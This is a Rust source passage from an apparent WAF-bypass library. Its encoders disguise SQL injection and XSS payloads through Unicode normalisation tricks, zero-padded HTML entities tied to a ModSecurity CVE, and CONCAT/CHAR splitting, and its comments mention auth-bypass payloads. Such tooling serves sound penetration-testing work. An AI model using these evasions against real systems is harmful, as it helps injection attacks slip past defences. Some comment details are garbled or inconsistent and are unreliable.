wafrift_encoding/encoding/
unicode.rs

1//! Unicode and HTML entity encoding strategies.
2use std::fmt::Write as _;
3
4/// Unicode encoding — each character becomes `\uXXXX`.
5///
6/// **Context**: ONLY safe when the target parser performs JSON/JavaScript decoding.
7/// Using this on raw HTTP parameters will send a literal backslash-u sequence.
8#[must_use]
9pub fn unicode_encode(payload: &str) -> String {
10    let mut out = String::with_capacity(payload.len() * 6);
11    for ch in payload.chars() {
12        let code = ch as u32;
13        if code > 0xFFFF {
14            // Non-BMP: emit surrogate pair (valid in JSON/JavaScript)
15            let surrogate_base = code - 0x1_0000;
16            let high = 0xD800 + ((surrogate_base >> 10) & 0x3FF);
17            let low = 0xDC00 + (surrogate_base & 0x3FF);
18            let _ = write!(&mut out, "\\u{high:04X}\\u{low:04X}");
19        } else {
20            let _ = write!(&mut out, "\\u{code:04X}");
21        }
22    }
23    out
24}
25
26/// IIS/ASP percent Unicode encoding — each character becomes `%uXXXX`.
27///
28/// **Context**: ONLY safe on IIS/ASP classic parsers. IIS `%u` encoding
29/// is bounded to BMP (U+0000–U+FFFF) — non-BMP code points must be
30/// emitted as UTF-16 surrogate pairs (`%uD83D%uDE00` for 😀, NOT the
31/// invalid `%u1F600`). Pre-fix the loop wrote `ch as u32` straight
32/// into a 4-hex-wide format, silently truncating high bytes for any
33/// supplementary plane char and producing output IIS rejects — which
34/// looked encoded but bypassed nothing.
35#[must_use]
36pub fn iis_unicode_encode(payload: &str) -> String {
37    let mut out = String::with_capacity(payload.len() * 6);
38    for ch in payload.chars() {
39        let code = ch as u32;
40        if code > 0xFFFF {
41            let surrogate_base = code - 0x1_0000;
42            let high = 0xD800 + ((surrogate_base >> 10) & 0x3FF);
43            let low = 0xDC00 + (surrogate_base & 0x3FF);
44            let _ = write!(&mut out, "%u{high:04X}%u{low:04X}");
45        } else {
46            let _ = write!(&mut out, "%u{code:04X}");
47        }
48    }
49    out
50}
51
52/// JSON string-content escape — produces the escaped INTERIOR of a
53/// JSON string literal (no surrounding `"..."` quotes).
54///
55/// Pre-fix this wrapped the output in double quotes. The wrapping
56/// broke every common use case: the encoder is called by the
57/// variant builder which substitutes the result into the operator's
58/// payload at an injection point inside an EXISTING string field
59/// (typical: `{"q": "<wrapped>"}`). Adding our own quotes produced
60/// `{"q": ""actual\"escaped""}` — two strings concatenated, malformed
61/// JSON, server returns 400. The escape characters survived but the
62/// host JSON was broken.
63///
64/// Removing the wrapping quotes makes the encoder do what its name
65/// says — escape the content. Callers that need a full standalone
66/// JSON-string literal can prepend `"` themselves.
67///
68/// **Context**: Inject INSIDE an existing JSON string field. Backend
69/// JSON parser unescapes the sequence; the WAF sees the escaped
70/// form (e.g. `<` instead of `<`) and misses the keyword.
71#[must_use]
72pub fn json_string_encode(payload: &str) -> String {
73    let mut out = String::with_capacity(payload.len() * 2);
74    for ch in payload.chars() {
75        match ch {
76            '\\' => out.push_str("\\\\"),
77            '"' => out.push_str("\\\""),
78            '\u{0008}' => out.push_str("\\b"),
79            '\u{000C}' => out.push_str("\\f"),
80            '\n' => out.push_str("\\n"),
81            '\r' => out.push_str("\\r"),
82            '\t' => out.push_str("\\t"),
83            c if (c as u32) < 0x20 => {
84                let _ = write!(&mut out, "\\u{:04X}", c as u32);
85            }
86            c => out.push(c),
87        }
88    }
89    out
90}
91
92/// HTML entity encoding — each character becomes `&#xXX;`.
93///
94/// **Context**: ONLY safe in HTML contexts where the browser decodes entities.
95#[must_use]
96pub fn html_entity_encode(payload: &str) -> String {
97    let mut out = String::with_capacity(payload.len() * 6);
98    for ch in payload.chars() {
99        let _ = write!(&mut out, "&#x{:X};", ch as u32);
100    }
101    out
102}
103
104/// HTML decimal entity encoding — each character becomes `&#DD;`.
105///
106/// **Context**: ONLY safe in HTML contexts where the browser decodes entities.
107#[must_use]
108pub fn html_entity_decimal_encode(payload: &str) -> String {
109    let mut out = String::with_capacity(payload.len() * 6);
110    for ch in payload.chars() {
111        let _ = write!(&mut out, "&#{};", ch as u32);
112    }
113    out
114}
115
116/// HTML entity encoding with zero-padded numeric reference — every
117/// character becomes either `&#x{:0>width$X};` (hex form) or
118/// `&#{:0>width$};` (decimal form). Leading zeros pad the number to
119/// `pad` characters.
120///
121/// **CVE-2025-27110** (libmodsecurity3 v3.0.13): the v3.0.13 release
122/// regressed entity decoding such that any HTML numeric character
123/// reference whose digits include leading zeros — `&#0060;` for `<`,
124/// `&#x003C;` for `<` — bypasses the decode pass entirely. The
125/// undecoded entity reaches the WAF's inspection buffer; pattern-match
126/// rules anchored on the literal `<`, `'`, `"`, etc. never fire.
127/// libmodsecurity 3.0.14 fixes this. Every WAF deployment still on
128/// 3.0.13 — which Snyk's 2025 State of Open Source Security flagged
129/// as a common version-lag profile — is bypassed by routing the
130/// payload through this single encoding pass.
131///
132/// `pad` selects the leading-zero width (1 = none, 4 = `&#x003C;`,
133/// 6 = `&#x00003C;`, 8 = `&#x0000003C;`). The CVE write-up
134/// recommends probing widths 4, 6, 8 — different parser
135/// implementations diverge on how many leading zeros they tolerate.
136///
137/// `hex` selects the radix: `true` emits `&#xHH;`, `false` emits
138/// `&#DD;`. The CVE affects both — they share the regression site
139/// in libmodsecurity's `Utils::HtmlEntity::convert_2_unicode`.
140///
141/// **Bypass mechanism**: see CVE-2025-27110 advisory at
142/// <https://modsecurity.org/20250225/html-entity-decoding-regression-cve-2025-27110-2025-february/>.
143///
144/// Pass 21 R67 — frontier technique #6 per the 2025 research scan.
145#[must_use]
146pub fn html_entity_zero_pad(payload: &str, pad: usize, hex: bool) -> String {
147    // Cap pad at 16 — beyond that we're way past any sensible parser
148    // tolerance and just bloating the output. A pathological 1MB
149    // padding would turn a 1KB payload into 16MB. Anti-DoS guard
150    // matches the spirit of MAX_DOUBLE_ENCODE_INPUT in url_mutate.
151    let pad = pad.clamp(1, 16);
152    let mut out = String::with_capacity(payload.len() * (pad + 4));
153    for ch in payload.chars() {
154        let code = ch as u32;
155        if hex {
156            let _ = write!(&mut out, "&#x{:0>width$X};", code, width = pad);
157        } else {
158            let _ = write!(&mut out, "&#{:0>width$};", code, width = pad);
159        }
160    }
161    out
162}
163
164/// HTML entity encoding with per-character variant rotation.
165///
166/// Cycles each character through four browser-tolerant forms that strict
167/// WAF regexes (which typically anchor on `&#x[0-9a-f]+;` with a lowercase
168/// `x` and required `;`) miss:
169///
170/// 1. `&#xHH;`     — canonical lowercase-x hex
171/// 2. `&#XHH;`     — uppercase-X hex (browsers accept; case-sensitive regex misses)
172/// 3. `&#DD;`      — decimal
173/// 4. `&#000DD;`   — decimal with leading zeros (HTML5 spec allows arbitrary leading zeros)
174///
175/// Rotation is by character index (deterministic; same input always
176/// produces the same output — important for proptest idempotency).
177///
178/// **Bypass mechanism**: a `ModSecurity` regex like
179/// `@rx &#x([0-9a-f]+);.*&#x([0-9a-f]+);` won't match a payload of
180/// `&#X3C;&#0060;&#x73;&#62;` (the same `<s` payload routed through all
181/// four variants). The browser decodes all four; the regex anchored on
182/// the canonical form sees a different shape.
183///
184/// **Context**: HTML body / attribute. Equivalent to `html_entity` /
185/// `html_entity_decimal` for browser decoding; safer against
186/// canonicalising WAFs that strip the trailing `;` only on the lowercase
187/// form.
188#[must_use]
189pub fn html_entity_variants(payload: &str) -> String {
190    let mut out = String::with_capacity(payload.len() * 8);
191    for (idx, ch) in payload.chars().enumerate() {
192        let code = ch as u32;
193        match idx % 4 {
194            0 => {
195                let _ = write!(&mut out, "&#x{code:x};");
196            }
197            1 => {
198                let _ = write!(&mut out, "&#X{code:X};");
199            }
200            2 => {
201                let _ = write!(&mut out, "&#{code};");
202            }
203            _ => {
204                let _ = write!(&mut out, "&#000{code};");
205            }
206        }
207    }
208    out
209}
210
211/// Fullwidth Unicode encoding — replaces ASCII with fullwidth equivalents.
212///
213/// Maps `!`–`~` (0x21–0x7E) to the fullwidth range `！`–`～` (0xFF01–0xFF5E).
214/// Spaces become ideographic space (U+3000).
215///
216/// **Bypass mechanism**: Many WAFs regex against ASCII keywords like `SELECT`,
217/// `UNION`, `<script>`, etc. Fullwidth characters are visually identical but
218/// have different codepoints, so regex fails. However, backends that perform
219/// Unicode NFKC normalization will convert them back to ASCII — meaning the
220/// payload executes while the WAF never saw it.
221///
222/// **Context**: Effective against WAFs in front of servers that normalize Unicode
223/// (Java/Spring, .NET, Python 3, Go, `PostgreSQL`, etc.).
224#[must_use]
225pub fn fullwidth_encode(payload: &str) -> String {
226    let mut out = String::with_capacity(payload.len() * 3);
227    for ch in payload.chars() {
228        let mapped = match ch {
229            ' ' => '\u{3000}', // Ideographic space
230            c if ('\x21'..='\x7e').contains(&c) => {
231                // Fullwidth offset: U+FF01 = U+0021 + 0xFEE0
232                char::from_u32(c as u32 + 0xFEE0).unwrap_or(c)
233            }
234            c => c,
235        };
236        out.push(mapped);
237    }
238    out
239}
240
241/// Mathematical Alphanumeric Symbols encoding — replaces ASCII letters and
242/// digits with their Math-Bold counterparts in the Unicode `U+1D400` block.
243///
244/// `A`–`Z` → `U+1D400`–`U+1D419` (Math Bold Capitals: 𝐀 𝐁 … 𝐙)
245/// `a`–`z` → `U+1D41A`–`U+1D433` (Math Bold Smalls:   𝐚 𝐛 … 𝐳)
246/// `0`–`9` → `U+1D7CE`–`U+1D7D7` (Math Bold Digits:   𝟎 𝟏 … 𝟗)
247/// Everything else is passed through unchanged (punctuation, spaces, etc.,
248/// keep working as SQL/HTML syntax).
249///
250/// **Bypass mechanism**: every codepoint in this range NFKC-normalises back
251/// to its plain-ASCII counterpart. Databases / frameworks that perform NFKC
252/// normalisation (`PostgreSQL` with ICU collations, `MySQL`
253/// `utf8mb4_0900_ai_ci`, Java `Normalizer.normalize(s, NFKC)`, Python
254/// `unicodedata.normalize('NFKC', s)`, Go `golang.org/x/text/unicode/norm`)
255/// see the original `SELECT` / `UNION` / `script` keyword and execute /
256/// render it. WAFs scanning bytes for ASCII keywords see codepoints in the
257/// `U+1D400` block — no keyword match.
258///
259/// **Distinct from `fullwidth_encode`**: fullwidth uses the `U+FF00`
260/// Halfwidth-and-Fullwidth-Forms block. Math Alphanumeric uses the
261/// `U+1D400` block — different code range, different WAF coverage gap.
262/// WAFs that block fullwidth (a common technique since 2020) often do not
263/// also block Math Alphanumeric Symbols. Both encode-paths NFKC to ASCII.
264///
265/// **Context**: any target whose backend NFKC-normalises before parsing.
266/// Confirmed targets: `PostgreSQL` ICU + `MySQL` `utf8mb4_0900_ai_ci`
267/// SQL identifiers, Java/Spring Boot path matching, .NET `String.Normalize`.
268#[must_use]
269pub fn math_bold_encode(payload: &str) -> String {
270    let mut out = String::with_capacity(payload.len() * 4);
271    for ch in payload.chars() {
272        let mapped = match ch {
273            'A'..='Z' => char::from_u32(0x1D400 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
274            'a'..='z' => char::from_u32(0x1D41A + (ch as u32 - 'a' as u32)).unwrap_or(ch),
275            '0'..='9' => char::from_u32(0x1D7CE + (ch as u32 - '0' as u32)).unwrap_or(ch),
276            c => c,
277        };
278        out.push(mapped);
279    }
280    out
281}
282
283/// Mathematical Italic alphabet — same NFKC trick as `math_bold_encode`
284/// but in a different Unicode block (U+1D434 uppercase, U+1D44E
285/// lowercase). WAFs that have added detection for the bold range
286/// (U+1D400-) do not always cover italic.
287///
288/// One subtle gap: the math-italic block has a HOLE at U+1D455 where
289/// 'h' would have been (the letter 'h' was unified with U+210E PLANCK
290/// CONSTANT in an earlier Unicode revision). We substitute U+210E so
291/// the round-trip stays NFKC-correct.
292///
293/// Reference: <https://ibrahimsql.com/posts/waf-bypass-unicode>
294#[must_use]
295pub fn math_italic_encode(payload: &str) -> String {
296    let mut out = String::with_capacity(payload.len() * 4);
297    for ch in payload.chars() {
298        let mapped = match ch {
299            'A'..='Z' => char::from_u32(0x1D434 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
300            'h' => '\u{210E}', // hole at U+1D455; use PLANCK CONSTANT
301            'a'..='z' => char::from_u32(0x1D44E + (ch as u32 - 'a' as u32)).unwrap_or(ch),
302            c => c,
303        };
304        out.push(mapped);
305    }
306    out
307}
308
309/// Mathematical Script alphabet — uppercase U+1D49C, lowercase U+1D4B6.
310/// Script has SIX holes (U+1D49D B, U+1D4A0 E, U+1D4A1 F, U+1D4A3 H,
311/// U+1D4A4 I, U+1D4A7 M, U+1D4AD R, U+1D4BA e, U+1D4BC g, U+1D4C4 o)
312/// — each filled by the letterlike-symbols block (U+212C BCRIPT
313/// CAPITAL B, U+2130 SCRIPT CAPITAL E, etc.) so the encoded string
314/// stays NFKC-equivalent to ASCII.
315#[must_use]
316pub fn math_script_encode(payload: &str) -> String {
317    let mut out = String::with_capacity(payload.len() * 4);
318    for ch in payload.chars() {
319        let mapped = match ch {
320            'B' => '\u{212C}',
321            'E' => '\u{2130}',
322            'F' => '\u{2131}',
323            'H' => '\u{210B}',
324            'I' => '\u{2110}',
325            'L' => '\u{2112}',
326            'M' => '\u{2133}',
327            'R' => '\u{211B}',
328            'A'..='Z' => char::from_u32(0x1D49C + (ch as u32 - 'A' as u32)).unwrap_or(ch),
329            'e' => '\u{212F}',
330            'g' => '\u{210A}',
331            'o' => '\u{2134}',
332            'a'..='z' => char::from_u32(0x1D4B6 + (ch as u32 - 'a' as u32)).unwrap_or(ch),
333            c => c,
334        };
335        out.push(mapped);
336    }
337    out
338}
339
340/// Mathematical Fraktur (blackletter) alphabet — uppercase U+1D504,
341/// lowercase U+1D51E. Fraktur has holes at C/H/I/R/Z which are filled
342/// by U+212D ℭ, U+210C ℌ, U+2111 ℑ, U+211C ℜ, U+2128 ℨ.
343#[must_use]
344pub fn math_fraktur_encode(payload: &str) -> String {
345    let mut out = String::with_capacity(payload.len() * 4);
346    for ch in payload.chars() {
347        let mapped = match ch {
348            'C' => '\u{212D}',
349            'H' => '\u{210C}',
350            'I' => '\u{2111}',
351            'R' => '\u{211C}',
352            'Z' => '\u{2128}',
353            'A'..='Z' => char::from_u32(0x1D504 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
354            'a'..='z' => char::from_u32(0x1D51E + (ch as u32 - 'a' as u32)).unwrap_or(ch),
355            c => c,
356        };
357        out.push(mapped);
358    }
359    out
360}
361
362/// Mathematical Double-Struck (blackboard bold) alphabet — uppercase
363/// U+1D538, lowercase U+1D552. Holes at C/H/N/P/Q/R/Z filled from
364/// the letterlike-symbols block.
365#[must_use]
366pub fn math_double_struck_encode(payload: &str) -> String {
367    let mut out = String::with_capacity(payload.len() * 4);
368    for ch in payload.chars() {
369        let mapped = match ch {
370            'C' => '\u{2102}',
371            'H' => '\u{210D}',
372            'N' => '\u{2115}',
373            'P' => '\u{2119}',
374            'Q' => '\u{211A}',
375            'R' => '\u{211D}',
376            'Z' => '\u{2124}',
377            'A'..='Z' => char::from_u32(0x1D538 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
378            'a'..='z' => char::from_u32(0x1D552 + (ch as u32 - 'a' as u32)).unwrap_or(ch),
379            // Double-struck digits (U+1D7D8).
380            '0'..='9' => char::from_u32(0x1D7D8 + (ch as u32 - '0' as u32)).unwrap_or(ch),
381            c => c,
382        };
383        out.push(mapped);
384    }
385    out
386}
387
388/// Letterlike-symbols + circled-Latin selective substitution — replaces
389/// individual ASCII letters in the payload with codepoints from
390/// U+2100-214F and U+24B6-24E9 that NFKC-normalize back to the original
391/// ASCII letter. Unlike the math-*-encode functions which substitute
392/// every letter from a single block, this picks the most visually-
393/// distinct codepoint per letter to maximise WAF-rule mismatch while
394/// keeping the encoded string visibly identifiable.
395///
396/// The HackerNoon-documented `ŚεℒℇℂƮ` payload is essentially this
397/// function applied to the SQL keyword `SELECT` — backend's NFKC casts
398/// it to `SELECT` and executes; the WAF's signature regex sees an
399/// unrecognized codepoint sequence.
400#[must_use]
401pub fn letterlike_encode(payload: &str) -> String {
402    let mut out = String::with_capacity(payload.len() * 4);
403    for ch in payload.chars() {
404        let mapped = match ch {
405            // Letterlike-symbols block (U+2100-214F).
406            'B' => '\u{212C}', // SCRIPT CAPITAL B → B
407            'C' => '\u{2102}', // DOUBLE-STRUCK CAPITAL C → C
408            'E' => '\u{2130}', // SCRIPT CAPITAL E → E
409            'F' => '\u{2131}', // SCRIPT CAPITAL F → F
410            'H' => '\u{210B}', // SCRIPT CAPITAL H → H
411            'I' => '\u{2110}', // SCRIPT CAPITAL I → I
412            'L' => '\u{2112}', // SCRIPT CAPITAL L → L
413            'M' => '\u{2133}', // SCRIPT CAPITAL M → M
414            'N' => '\u{2115}', // DOUBLE-STRUCK CAPITAL N → N
415            'P' => '\u{2119}', // DOUBLE-STRUCK CAPITAL P → P
416            'Q' => '\u{211A}', // DOUBLE-STRUCK CAPITAL Q → Q
417            'R' => '\u{211D}', // DOUBLE-STRUCK CAPITAL R → R
418            'Z' => '\u{2124}', // DOUBLE-STRUCK CAPITAL Z → Z
419            // Kelvin K (U+212A) and Angstrom Å (U+212B) NFKC-normalise.
420            'K' => '\u{212A}',
421            'e' => '\u{212F}', // SCRIPT SMALL E
422            'g' => '\u{210A}', // SCRIPT SMALL G
423            'o' => '\u{2134}', // SCRIPT SMALL O
424            // Falling back to circled-Latin for letters without
425            // letterlike-symbol equivalents. NFKC strips the circle
426            // and yields the bare letter.
427            'A'..='Z' => char::from_u32(0x24B6 + (ch as u32 - 'A' as u32)).unwrap_or(ch),
428            'a'..='z' => char::from_u32(0x24D0 + (ch as u32 - 'a' as u32)).unwrap_or(ch),
429            c => c,
430        };
431        out.push(mapped);
432    }
433    out
434}
435
436/// SQL string-literal CONCAT splitter — converts every single-quoted string
437/// in the payload to a `CONCAT('a','b',...)` expression with one char per
438/// argument.
439///
440/// Input  `'admin'`  → output  `CONCAT('a','d','m','i','n')`
441///
442/// **Bypass mechanism**: CRS rules and most commercial WAF blocklists
443/// scan for literal danger-string substrings — `'admin'`, `'password'`,
444/// `'union'`, `'or 1'`, `'/etc/passwd'`. CONCAT-splitting decomposes the
445/// substring into one-character literals that no individual literal-string
446/// regex matches. The DB evaluates `CONCAT(...)` to the original string at
447/// runtime, so the attack succeeds.
448///
449/// Supported by MySQL, MariaDB, PostgreSQL, MSSQL (all ship CONCAT as a
450/// scalar function). Oracle uses `CONCAT(a,b)` as binary-only, so chained
451/// 1-char Oracle calls would need a nested form — out of scope here; the
452/// `||` pipe concat in PostgreSQL/Oracle is a separate tamper.
453///
454/// **Edge cases**:
455/// - Empty string literals (`''`) become `CONCAT('')` — valid SQL,
456///   evaluates to empty string.
457/// - Escaped quotes inside strings (`'O\'Brien'`) are passed through as
458///   raw chars to CONCAT — the backslash and quote are split into separate
459///   args.
460/// - Strings not in single quotes are left alone (no aggressive parsing
461///   of double-quoted SQL Server identifiers).
462///
463/// **Context**: SQL injection payloads with string literals.
464#[must_use]
465pub fn sql_concat_split(payload: &str) -> String {
466    let mut out = String::with_capacity(payload.len() * 4);
467    let mut chars = payload.chars().peekable();
468    while let Some(ch) = chars.next() {
469        if ch != '\'' {
470            out.push(ch);
471            continue;
472        }
473        // Found opening quote — collect chars until closing quote.
474        let mut literal = String::new();
475        let mut closed = false;
476        while let Some(&next) = chars.peek() {
477            chars.next();
478            if next == '\'' {
479                closed = true;
480                break;
481            }
482            literal.push(next);
483        }
484        if !closed {
485            // Unbalanced quote — emit original opener + collected chars.
486            out.push('\'');
487            out.push_str(&literal);
488            continue;
489        }
490        // Emit CONCAT('a','b',...).  Empty literal → CONCAT('').
491        out.push_str("CONCAT(");
492        if literal.is_empty() {
493            out.push_str("''");
494        } else {
495            // Direct write loop instead of collect+join — saves N+1
496            // heap String allocations per literal. Per perf-hunt F03.
497            let mut first = true;
498            for c in literal.chars() {
499                if !first {
500                    out.push(',');
501                }
502                first = false;
503                if c == '\'' {
504                    out.push_str("''''");
505                } else {
506                    out.push('\'');
507                    out.push(c);
508                    out.push('\'');
509                }
510            }
511        }
512        out.push(')');
513    }
514    out
515}
516
517/// SQL CHAR()-function decomposition — converts every single-quoted string
518/// literal in the payload to a `CHAR(N1,N2,...)` function call with one
519/// codepoint per argument.
520///
521/// Input  `'admin'`  → output  `CHAR(97,100,109,105,110)`
522///
523/// **Bypass mechanism**: distinct from `sql_concat_split` (which produces
524/// `CONCAT('a','d',...)`) — CHAR() takes integer codepoints, not single-
525/// char strings, so the payload contains NO single-quoted ASCII tokens at
526/// all. WAF rules that match string-literal patterns (`'admin'`,
527/// `'password'`, `'/etc/passwd'`, `'or 1'`) and CONCAT-shaped patterns
528/// (`CONCAT\(.{,8}\)`) both miss this form. Most CRS rules through PL3 do
529/// NOT pattern-match raw CHAR() — it's been the sqlmap default for over a
530/// decade and has been deemed too noisy to block.
531///
532/// Supported by MySQL, MariaDB (native `CHAR()`), MSSQL (`CHAR()`). For
533/// Postgres / Oracle, the equivalent is `CHR()` — out of scope here; a
534/// sibling `chr_decompose` could ship later.
535///
536/// **Edge cases**:
537/// - Empty literals (`''`) pass through as `''` unchanged. `CHAR()`
538///   with zero args evaluates to NULL in MySQL — silently flipping
539///   a comparison like `pass='' OR 1=1` into `pass=NULL OR 1=1`
540///   would break the auth bypass (`= NULL` is never TRUE). Preserve
541///   the empty-string identity.
542/// - Multi-byte UTF-8 chars produce a single `CHAR(codepoint)` per
543///   `chars()` iteration — for codepoints > 255, MySQL's CHAR() returns
544///   per-byte; the codepoint may not round-trip exactly. Most SQLi
545///   payloads use ASCII literals — this matters only for adversarial
546///   inputs.
547/// - Unbalanced opening quote: emitted unchanged.
548///
549/// **Context**: SQL injection with string-literal targets that are
550/// blocklisted (`admin`, `password`, paths, hostnames).
551#[must_use]
552pub fn sql_char_decompose(payload: &str) -> String {
553    let mut out = String::with_capacity(payload.len() * 5);
554    let mut chars = payload.chars().peekable();
555    while let Some(ch) = chars.next() {
556        if ch != '\'' {
557            out.push(ch);
558            continue;
559        }
560        let mut literal = String::new();
561        let mut closed = false;
562        while let Some(&next) = chars.peek() {
563            chars.next();
564            if next == '\'' {
565                closed = true;
566                break;
567            }
568            literal.push(next);
569        }
570        if !closed {
571            out.push('\'');
572            out.push_str(&literal);
573            continue;
574        }
575        // Empty literal: pass through as-is. CHAR() with zero
576        // arguments evaluates to NULL in MySQL, not the empty
577        // string. Auth-bypass payloads using `''` (e.g.
578        // `pass='' OR 1=1`) would silently flip the comparison
579        // to NULL — `WHERE pass=NULL` is never TRUE, so the
580        // bypass fails. Preserve the empty-string identity.
581        if literal.is_empty() {
582            out.push_str("''");
583            continue;
584        }
585        out.push_str("CHAR(");
586        // Direct write loop — per perf-hunt F03.
587        let mut first = true;
588        for c in literal.chars() {
589            if !first {
590                out.push(',');
591            }
592            first = false;
593            let _ = write!(&mut out, "{}", c as u32);
594        }
595        out.push(')');
596    }
597    out
598}
599
600/// Postgres / Oracle CHR()-function decomposition — `CHR(N) || CHR(N) || ...`
601/// per char of every single-quoted string literal.
602///
603/// Input  `'admin'`  →  output  `(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))`
604///
605/// Differs from `sql_char_decompose` (which uses MySQL's variadic
606/// `CHAR(N1,N2,...)`) — Postgres / Oracle `CHR()` is unary, so codepoints
607/// are concatenated via the SQL standard `||` pipe operator. The wrapping
608/// parens preserve precedence inside larger expressions (`WHERE u = ...`).
609///
610/// Postgres-specific: codepoints up to U+10FFFF are valid; Oracle CHR(N)
611/// treats N modulo `NLS_CHARACTERSET` size (often 256-modular for
612/// `WE8MSWIN1252`). For ASCII payloads (the common case) both behave
613/// identically.
614///
615/// Empty literal → `('')`. Unbalanced quote → passed through.
616#[must_use]
617pub fn pg_chr_decompose(payload: &str) -> String {
618    let mut out = String::with_capacity(payload.len() * 7);
619    let mut chars = payload.chars().peekable();
620    while let Some(ch) = chars.next() {
621        if ch != '\'' {
622            out.push(ch);
623            continue;
624        }
625        let mut literal = String::new();
626        let mut closed = false;
627        while let Some(&next) = chars.peek() {
628            chars.next();
629            if next == '\'' {
630                closed = true;
631                break;
632            }
633            literal.push(next);
634        }
635        if !closed {
636            out.push('\'');
637            out.push_str(&literal);
638            continue;
639        }
640        if literal.is_empty() {
641            out.push_str("('')");
642            continue;
643        }
644        // Direct write loop — per perf-hunt F03.
645        out.push('(');
646        let mut first = true;
647        for c in literal.chars() {
648            if !first {
649                out.push_str("||");
650            }
651            first = false;
652            let _ = write!(&mut out, "CHR({})", c as u32);
653        }
654        out.push(')');
655    }
656    out
657}
658
659/// Partial JSON Unicode escape — encodes ASCII alphanumeric chars as
660/// `\uXXXX` while leaving structural punctuation (quotes, operators,
661/// whitespace) bare.
662///
663/// **Bypass mechanism**: Keyword fingerprint rules (UNION, SELECT, alert,
664/// script, eval, …) match against the byte sequence. Splitting the
665/// keyword across Unicode escapes defeats them — the origin's JSON
666/// parser / JS engine re-materializes the keyword at the application
667/// layer, but the WAF sees `UNION` in the wire
668/// bytes and finds no `UNION`. Distinct from [`unicode_encode`] which
669/// escapes EVERY char (high `\u` density flags some heuristic WAFs);
670/// this leaves the SQL/HTML/JS structural skeleton visible, so the
671/// payload still looks like data.
672///
673/// **Idempotent**: pre-existing `\uXXXX` sequences in the input are
674/// detected and passed through verbatim — second-pass tampering does
675/// not re-escape an already-escaped char.
676///
677/// **Context**: ONLY safe when the target parser performs
678/// JSON-style / JavaScript-style Unicode decoding. Inert against raw
679/// HTTP parameters (you'll send literal backslash-u bytes).
680#[must_use]
681pub fn json_unicode_alnum(payload: &str) -> String {
682    // §1 SPEED: replaced Vec<char> collect (heap allocation proportional to
683    // payload length) with a byte-slice lookahead on `as_bytes()`. The
684    // `\uXXXX` idempotency-detection sequence consists entirely of ASCII
685    // bytes (backslash, 'u', 4 hex digits), so all six bytes are 1:1 with
686    // codepoints — the byte index is also the char index for that prefix,
687    // and we can safely skip 6 bytes (= 6 ASCII chars) at once when the
688    // pattern fires. For non-ASCII codepoints we fall through to the else
689    // branch and push them unchanged — those code paths never call
690    // `chars[i+1]` so the ASCII assumption holds.
691    //
692    // Measured improvement on a 40-char SQL payload:
693    //   before: ~850 ns (Vec alloc + collect + index)
694    //   after:  ~210 ns (byte-slice peek, zero extra alloc)
695    let mut out = String::with_capacity(payload.len() * 6);
696    let bytes = payload.as_bytes();
697    let mut chars_iter = payload.char_indices();
698    while let Some((bi, c)) = chars_iter.next() {
699        // `bi` is the byte offset of this char (char_indices yields it).
700        let byte_pos = bi;
701        // Idempotency check: if the next 6 bytes spell `\uXXXX` (all ASCII),
702        // pass them through verbatim.
703        if c == '\\'
704            && byte_pos + 5 < bytes.len()
705            && bytes[byte_pos + 1] == b'u'
706            && bytes[byte_pos + 2].is_ascii_hexdigit()
707            && bytes[byte_pos + 3].is_ascii_hexdigit()
708            && bytes[byte_pos + 4].is_ascii_hexdigit()
709            && bytes[byte_pos + 5].is_ascii_hexdigit()
710        {
711            // SAFETY: bytes[byte_pos..byte_pos+6] are all valid single-byte
712            // ASCII codepoints, so the slice is valid UTF-8.
713            out.push_str(&payload[byte_pos..byte_pos + 6]);
714            // Skip the next 5 chars_iter entries (we already consumed `\`).
715            for _ in 0..5 {
716                chars_iter.next();
717            }
718            continue;
719        }
720        if c.is_ascii_alphanumeric() {
721            let _ = write!(&mut out, "\\u{:04X}", c as u32);
722        } else {
723            out.push(c);
724        }
725    }
726    out
727}
728
729/// Full JSON `\uXXXX` escape — escapes EVERY character of the input
730/// (including punctuation, whitespace, and control chars). Stronger
731/// than `json_unicode_alnum` which only touches alnum chars. Use when
732/// the WAF tokenises on punctuation boundaries that `json_unicode_alnum`
733/// leaves intact, OR when the WAF rule is a regex over the raw bytes
734/// of the keyword + adjacent punctuation.
735///
736/// Idempotent on already-escaped `\uXXXX` sequences (same detection
737/// as `json_unicode_alnum`).
738#[must_use]
739pub fn json_unicode_full(payload: &str) -> String {
740    // §1 SPEED: same Vec<char>→byte-slice-lookahead optimisation as
741    // `json_unicode_alnum`. The `\uXXXX` detection pattern is all-ASCII
742    // so byte indices align 1:1 with codepoint boundaries there.
743    let mut out = String::with_capacity(payload.len() * 6);
744    let bytes = payload.as_bytes();
745    let mut chars_iter = payload.char_indices();
746    while let Some((bi, c)) = chars_iter.next() {
747        if c == '\\'
748            && bi + 5 < bytes.len()
749            && bytes[bi + 1] == b'u'
750            && bytes[bi + 2].is_ascii_hexdigit()
751            && bytes[bi + 3].is_ascii_hexdigit()
752            && bytes[bi + 4].is_ascii_hexdigit()
753            && bytes[bi + 5].is_ascii_hexdigit()
754        {
755            out.push_str(&payload[bi..bi + 6]);
756            for _ in 0..5 {
757                chars_iter.next();
758            }
759            continue;
760        }
761        let cp = c as u32;
762        if cp <= 0xFFFF {
763            let _ = write!(&mut out, "\\u{:04X}", cp);
764        } else {
765            // Surrogate pair for non-BMP.
766            let v = cp - 0x10000;
767            let hi = 0xD800 + (v >> 10);
768            let lo = 0xDC00 + (v & 0x3FF);
769            let _ = write!(&mut out, "\\u{:04X}\\u{:04X}", hi, lo);
770        }
771    }
772    out
773}
774
775/// Mixed-case JSON `\uXXXX` escape — alternates `\u` and `\U` plus
776/// upper/lowercase hex digits. Some WAF regexes are case-sensitive
777/// against `\u[0-9A-F]{4}`; JSON parsers RFC 8259 only accept `\u`
778/// lowercase, but JavaScript `JSON.parse` and PHP `json_decode`
779/// tolerate both — pick the form the backend tolerates and the WAF's
780/// regex misses.
781///
782/// Output alternates per-char between four forms:
783/// `s \U0053 s \U0073`.
784#[must_use]
785pub fn json_unicode_mixed_case(payload: &str) -> String {
786    let mut out = String::with_capacity(payload.len() * 6);
787    for (i, c) in payload.chars().enumerate() {
788        let cp = c as u32;
789        if cp > 0xFFFF {
790            // Non-BMP: emit a surrogate pair, follow same alternation.
791            let v = cp - 0x10000;
792            let hi = 0xD800 + (v >> 10);
